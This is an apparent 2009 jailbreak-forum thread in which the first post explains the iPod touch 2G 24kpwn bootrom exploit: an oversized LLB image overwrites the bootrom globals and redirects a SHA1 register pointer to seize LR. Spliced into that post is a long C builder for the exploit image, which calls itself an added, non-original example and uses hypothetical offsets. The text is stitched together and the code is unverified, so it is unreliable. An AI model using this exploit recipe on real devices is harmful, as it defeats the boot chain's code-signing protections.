A more in-depth explanation of the new exploit

Discussion in 'iPod touch 2G Jailbreak: redsn0w, 24kpwn, etc.' started by shortperson1026, Mar 10, 2009.

  1. shortperson1026

    shortperson1026 Active Member

    Joined:
    Apr 11, 2008
    Messages:
    3,455
    Likes Received:
    21
    Note

    It is unclear how, but the company "NitroKey" is selling this. We were planning on holding back for the new iPhone (which subsequently could mean an iPod 3G as well), but now that they are profiteering off of this we would like to explain exactly how this works as soon as possible so people do not have to pay for it. I apologize if the wording is odd, as I wrote it up a little while ago, planning to post it this summer.

    Credit

    chronic, CPICH, ius, planetbeing, pod2g, posixninja, and co.

    Exploit

    The address that the bootrom loads LLB into is 0x22000000, and for some reason it stores its global variables dangerously close, at 0x22024000. Now, when loading LLB from NOR, it does not have any sort of maximum size limit, unlike when it is receiving a file via USB. You can just gracefully overwrite, and for some parts will need to reconstruct, the beginning of the data (_bss) section.

    There are a few different ways you could exploit this to actually run unsigned code at this level, but so far the easiest one found is based on another failed decision that Apple made. For some reason, they put the SHA1 hardware address array smack dab in our way, so at this point you can change anything there that you want. By changing the pointer to SHA1 Data Input Register 1 into a pointer to where the current LR is on the stack, it will put whatever is at 0x20 of the image into LR, which is all that is important. By putting your payload somewhere in the padding (you need padding, since LLB is obviously less than 0x24000 bytes), you can just put the address of it at 0x20 of the image!

    If you actually don't want to run unsigned code but instead just want to run the LLB, then you will first need to have it put the original bytes back at 0x20 in the file before you do anything else, as well as put the original SHA1 hardware address back in the array.

    Another important thing to remember is that you must:
    1. add 0x22000000 to whatever the offset of your payload is in the file, since that is where it loads LLB in memory, and
    2. reverse it for endianness.

    Prerequisites

    Because files sent over USB have a size limitation, one thing that is needed is the ability to flash the NOR unsigned.

    Via the iphone wiki page HERE.
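The image layout the post above describes, as an added example that is not part of the original post and not the dev team's or any public tool's code: a small C builder that pads an LLB out to the bootrom globals at 0x22000000 + 0x24000, drops a payload into the padding, replaces the SHA1 input-register pointer inside the (caller-reconstructed) globals with the stack address of the saved LR, and writes the little-endian payload address at file offset 0x20. The load address, the 0x24000 globals offset and the 0x20 word come from the post; the offset of the SHA1 pointer inside the globals (`sha1_ptr_off`), the saved-LR stack address (`saved_lr_addr`), the reconstructed globals bytes and the sample LLB/payload are hypothetical placeholders constructed here and would have to be taken from a real bootrom and device.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Values stated in the post. */
#define LLB_LOAD_ADDR       0x22000000u  /* bootrom copies LLB from NOR to here            */
#define BOOTROM_GLOBALS_OFF 0x24000u     /* bootrom globals (_bss) begin at 0x22024000     */
#define IMAGE_LR_WORD_OFF   0x20u        /* image word the bootrom ends up writing into LR */

/* The target is a little-endian ARM core, so every word goes into the file byte-reversed. */
static void put_le32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}
static uint32_t get_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/*
 * Lay out a 24kpwn-style NOR image:
 *   [0, llb_len)                      original LLB
 *   [payload_off, +payload_len)       payload in the padding below 0x24000
 *   [..., 0x24000)                    zero padding
 *   [0x24000, 0x24000 + bss_len)      reconstructed bootrom globals supplied by the caller,
 *                                     with the SHA1 data-input-register pointer replaced by
 *                                     the address of the saved LR on the bootrom stack.
 * Returns the image length, or 0 if the pieces do not fit.
 */
size_t build_24kpwn_image(const uint8_t *llb, size_t llb_len,
                          const uint8_t *payload, size_t payload_len,
                          const uint8_t *bss, size_t bss_len,
                          size_t sha1_ptr_off,    /* hypothetical: offset of the SHA1 pointer in _bss */
                          uint32_t saved_lr_addr, /* hypothetical: stack slot holding the bootrom LR */
                          uint8_t *out, size_t out_cap, size_t *payload_off_out)
{
    size_t payload_off = (llb_len + 3) & ~(size_t)3;     /* keep the payload 4-byte aligned */
    size_t total = BOOTROM_GLOBALS_OFF + bss_len;

    if (llb_len < IMAGE_LR_WORD_OFF + 4) return 0;        /* no word at 0x20 to patch      */
    if (payload_off + payload_len > BOOTROM_GLOBALS_OFF) return 0; /* must stay in padding */
    if (sha1_ptr_off + 4 > bss_len) return 0;             /* pointer must lie in the globals */
    if (total > out_cap) return 0;

    memset(out, 0, total);
    memcpy(out, llb, llb_len);
    memcpy(out + payload_off, payload, payload_len);
    memcpy(out + BOOTROM_GLOBALS_OFF, bss, bss_len);

    /* The SHA1 "register" now aliases the saved-LR slot: when the bootrom feeds the
       image word at 0x20 into the engine it writes that word over its own LR. */
    put_le32(out + BOOTROM_GLOBALS_OFF + sha1_ptr_off, saved_lr_addr);

    /* The value that lands in LR: load address plus the payload's offset in the file. */
    put_le32(out + IMAGE_LR_WORD_OFF, LLB_LOAD_ADDR + (uint32_t)payload_off);

    if (payload_off_out) *payload_off_out = payload_off;
    return total;
}

/* Key facts about a built image, for inspection. */
struct demo_result { size_t image_len; size_t payload_off; uint32_t lr_word; uint32_t sha1_ptr; };

/* Build from constructed stand-in input (not a real LLB or real bootrom globals). */
struct demo_result demo_build(void) {
    static const uint8_t llb[0x40] = { 'L', 'L', 'B' };              /* constructed */
    static const uint8_t payload[8] = { 0xfe, 0xff, 0xff, 0xea, 0, 0, 0, 0 }; /* ARM "b ." */
    static const uint8_t bss[0x200] = { 0 };                          /* constructed */
    static uint8_t image[BOOTROM_GLOBALS_OFF + 0x200];
    const size_t   sha1_ptr_off  = 0x100;       /* hypothetical placeholder */
    const uint32_t saved_lr_addr = 0x2202ff00u; /* hypothetical placeholder */
    struct demo_result r = { 0, 0, 0, 0 };

    r.image_len = build_24kpwn_image(llb, sizeof llb, payload, sizeof payload,
                                     bss, sizeof bss, sha1_ptr_off, saved_lr_addr,
                                     image, sizeof image, &r.payload_off);
    if (r.image_len) {
        r.lr_word  = get_le32(image + IMAGE_LR_WORD_OFF);
        r.sha1_ptr = get_le32(image + BOOTROM_GLOBALS_OFF + sha1_ptr_off);
    }
    return r;
}

int main(void) {
    struct demo_result r = demo_build();
    printf("image %zu bytes, payload at 0x%zx, LR word 0x%08x, SHA1 ptr 0x%08x\n",
           r.image_len, r.payload_off, r.lr_word, r.sha1_ptr);
    return r.image_len ? 0 : 1;
}
```

As the post notes, a payload that only wants to hand control back to the stock LLB must first restore the original word at 0x20 and the original SHA1 register address before doing anything else; this builder leaves that to the payload, and a real image needs the genuine globals contents in place of the zeroed `bss` stand-in.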
  2. Nathan B

    Nathan B Active Member

    Joined:
    Dec 12, 2008
    Messages:
    3,061
    Likes Received:
    0
    Device:
    iPhone 5 (Black)
    Nice

    So, what have the iPhone dev team said they are going to do? Have they given an ETA for the untethered release?
  3. shortperson1026

    shortperson1026 Active Member

    Joined:
    Apr 11, 2008
    Messages:
    3,455
    Likes Received:
    21
  4. neetan

    neetan Member

    Joined:
    Dec 30, 2008
    Messages:
    82
    Likes Received:
    0
    Device:
    iPhone 4S (White)
    This makes a lot more sense

    but can you post it?
  5. shortperson1026

    shortperson1026 Active Member

    Joined:
    Apr 11, 2008
    Messages:
    3,455
    Likes Received:
    21
    Yes. I just did.
  6. Nathan B

    Nathan B Active Member

    Joined:
    Dec 12, 2008
    Messages:
    3,061
    Likes Received:
    0
    Device:
    iPhone 5 (Black)
    I think he means can you post how to do it
  7. shortperson1026

    shortperson1026 Active Member

    Joined:
    Apr 11, 2008
    Messages:
    3,455
    Likes Received:
    21
    No I don't know how.
  8. AmazingNachos

    AmazingNachos Banned

    Joined:
    Feb 23, 2009
    Messages:
    481
    Likes Received:
    0
    Device:
    2G iPod touch
    I read MuscleNerd would update quickpwn for it
  9. neetan

    neetan Member

    Joined:
    Dec 30, 2008
    Messages:
    82
    Likes Received:
    0
    Device:
    iPhone 4S (White)
    No, I never meant anything like that. LOL
    I meant, would you get banned?
  10. Nathan B

    Nathan B Active Member

    Joined:
    Dec 12, 2008
    Messages:
    3,061
    Likes Received:
    0
    Device:
    iPhone 5 (Black)
    Woot